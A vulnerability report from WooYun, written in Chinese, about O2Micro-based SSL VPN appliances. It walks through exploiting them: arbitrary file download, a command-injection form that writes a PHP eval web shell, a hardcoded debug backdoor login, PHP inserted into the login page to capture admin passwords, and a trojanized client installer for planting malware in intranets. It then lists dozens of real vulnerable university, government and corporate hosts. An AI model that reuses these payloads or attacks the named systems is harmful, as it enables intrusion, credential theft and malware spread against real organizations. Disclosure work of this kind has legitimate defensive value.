WooYun.org

看到在北大读研的同学Ray发的信息东点西点进到了vpn.pku.edu.cn(当时还是o2的vpn,现在可以借鉴北大计算中心https://124.205.79.78/)然后尝试渗透测试,发现有个证书请求链接,点进去看可以下载东西,但是没有初始化mimiCA,于是想到同源通注,就去网上找相同代码特征的系统 很容易地找到了vpn.cnu.edu.cn/sub_ca.php

在sub_ca_action.php?id=0看到 任意文件下载

分别传入参数/etc/httpd/httpd.conf 和 httpd.conf获得apache配置 找到了web根路径为/ssl/www 于是想看看漏洞代码是如何的
然后分别传入传 /ssl/www/minica_down.php 和minica_down.php下载minica_down.php
前两行是发现

if($_POST['realfile'])
	exec("cp ".$_POST['realfile']." ".$_POST['path']."");

（感觉这些vpn设备的开发管用C和shell的思想,所以喜欢用system和exec不喜欢php内置函数）
幸好之前在淘宝实习时学过白盒 能看懂些代码 于是 有了任意命令执行

<form action="https://IP/minica_down.php" method="post">
<input name="realfile" type="hidden" value="aimee.php aimee.php || echo '<?php eval($_POST[cmd]);?>It works' >/ssl/www/aimee.php ">
<input type=hidden>
<input type=submit>
</form>

提交一个后门

用菜刀连接，获得root权限, 这还没结束。
对代码进行些审计,发现开发留的后门/ssl/www/admin/debug.php 帐号密码o2micro killbug(部分厂家已经去掉)
然后发现mysql不向外开放并且是unix的socket方式去访问的
但是可以通过
ini_set("mysql.default_socket = /var/run/mysql/mysql.sock"); 去连接
可以exec("/ssl/mysqld/mysqldump >xxx") 导出或是用exec执行sql等
然后管理员密码是sha1加密了的 于是在/ssl/www/admin/login_action.php第128行(认证成功后)加入 (初学php,别见笑)

$obj=file_get_contents("admin.json");
		$userList=json_decode($obj);
		$userList->$UserName=$UserPass;
		file_put_contents("admin.json",json_encode($userList));

钓取管理员账号密码
钓鱼后进入后台了解了下系统,发现三方LDAP、AD认证方式管理帐号密码可以在html代码中看到明文,
其次就是存储三方系统登录地址、帐号、密码用来实现SSO的子帐号也是明文,数据库中一看,证实未进行任何加密处理,至少也应该来个AES吧(一些系统没配认证方式和子帐号)
使用一次vpn后发现是web端安装插件方式安装客户端,于是尝试给客户端加点东西试试,对于dll绑恶意dll我不会(而且给dll签名没证书),只能在exe上拙劣的下手,于是到/ssl/www/download/ClientSetup.exe(app.exe.cab应该也存在问题)
下载下来,用winrar生成自解压运行的包含恶意文件和ClientSetup.exe的新ClientSetup.exe 传入到原目录替换后能够达到在内网种植木马的功效。
-------------------------------------------------------
存在漏洞的站点至少包括
美国凹凸科技(o2security)
https://vpn.bit.edu.cn/ 北京理工
https://sslvpn.bjtu.edu.cn/ 北交大
https://125.46.88.100/ 郑州大学
https://219.80.0.19/p 国泰地产集团
https://info.nai.edu.cn/ 北京国家会计学院
https://124.205.79.78/ 北大计算中心
https://210.82.53.201/ 北京联合大学
https://vpn.cnu.edu.cn/ 首都师大
https://vpn.mcut.edu.tw/ 台湾明志科技大学
https://ac.whlib.gov.cn 武汉图书馆
https://sslvpn.nhcue.edu.tw 新竹教育大学
https://isms.ydu.edu.tw/ 育達商業科技大學
https://sslvpn.ydu.edu.tw/ 育達商業科技大學
https://vpn.cute.edu.tw 中国(台湾)科技大学
https://sslvpn.ntue.edu.tw 国立台北教育大学
https://vpn.psi.com.tw 升阳国际
https://maltimur.jksm.gov.my/ 马来西亚某政府网站
https://vpn.ccom.edu.cn 中央音乐学院
https://vpn.dlmu.edu.cn 大连海事大学
https://vpn.wanfang.edu.cn 河南理工
https://vpn.genius.com.cn 深圳巨灵
https://sslvpn.changhongit.com 长虹佳华
https://vpn.jnrd.com.cn 北京京能热电
https://sslvpn.kworld.com.tw 廣寰台北辦公室
https://www.oo586.com/ 易宝支付
https://svpn.mbatec.com.tw 新碩資訊
https://sslvpn.szs.com.tw 新日兴
https://sslvpn.gzcatv.net 广数传媒
https://e.nais.net.cn 农业部农E通
https://vpn.thcic.cn 清华
https://vpn.pku.edu.cn/ 北大(已经失效)
https://vpn.cau.edu.cn/ 中国农大(已经换了)
https://sh-vpn.o2micro.com o2
https://bj-vpn.o2micro.com o2
https://cd-vpn.o2micro.com o2
天融信 网络卫士VPN系统(admin/debug.php o2micro killbug)
https://218.26.21.194/ 山西邮政VPN系统
https://218.26.7.112/ 山西检验检疫局VPN系统
联想网神-网御神州 SecSSL3600(号称国内第一的SSLVPN)
https://220.178.250.102/ 马鞍山市行政事业单位资产管理信息系统
https://vpn.hnuu.edu.cn/ 淮南联大
https://222.75.160.120/
https://60.191.18.54/
https://61.191.18.137/ 合肥市房地产市场信息系统
https://218.22.51.114/ 安徽省肥西财政局
https://183.166.187.156/ 黄山市网上房地产信息系统
https://oa.qzbsg.gov.cn 广西钦州保税港区
https://www.smfgny.com 陕西煤业化工集团
https://cbj.1203.org 残疾人就业保障金征缴管理系统
https://58.54.252.40 荆州电子政务外网
https://218.24.94.244 沈阳市经济和信息化委员会
https://219.141.234.54/ 中国渔政管理指挥系统
https://vpn.cdc.com.cn 成都普天电缆
https://58.242.162.242/
https://116.236.137.18/
https://oa.qzbsg.gov.cn/
https://122.225.14.154/
https://60.191.18.54/
西安网赢信息技术有限公司 护航者
https://125.65.179.230/ 四川省丹棱县党政综合办公平台
https://www.scxjrz.com/ 四川电信安全运营中心
德国ANIX
https://vpn.tgsh.ttct.edu.tw/ 台东女中
卫士通 中华卫士
https://ssl.qztc.com/welcome.php 泉州电信
吉大正元
https://oa.chnmuseum.cn/ 国家博物馆
https://218.62.26.250/
https://219.143.243.103/
这些里面没有minica_down的就有debug后门,没debug的就有minica_down问题 很多是都存在。
在这些厂商描述中他们在公安网 银行专网 审计署内部网络 司法专网等私网也用了这些系统保护信息安全 据我猜想如果这些私网中肯定更有很多不堪一击的系统。
所以个人认为内网安全不能仅仅去依靠防火墙 VPN IDS等设备去完成 一旦这些设备出现问题 或是被合法绕过 里面的系统如果安全性不够的话 信息泄漏是很轻易的事。